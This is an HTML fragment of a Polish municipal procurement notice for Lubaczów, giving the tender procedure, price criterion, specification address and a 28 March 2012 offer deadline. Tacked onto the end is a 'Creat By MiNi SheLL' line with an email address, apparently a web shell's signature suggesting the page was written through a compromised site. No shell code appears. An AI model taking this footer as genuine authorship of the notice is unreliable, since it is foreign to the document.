<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubaczow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek Wykonawcy Specyfikację istotnych warunków zamówienia można odebrać w siedzibie Urzędu Miejskiego w Lubaczowie, ul. Rynek 26, pok.15 lub za zaliczeniem pocztowym.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.03.2012 godzina 10:00, miejsce: w siedzibie zamawiającego Urząd Miejski w Lubaczowie ul. Rynek 26,  37-600 Lubaczów, pokój   nr 7, sekretariat,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com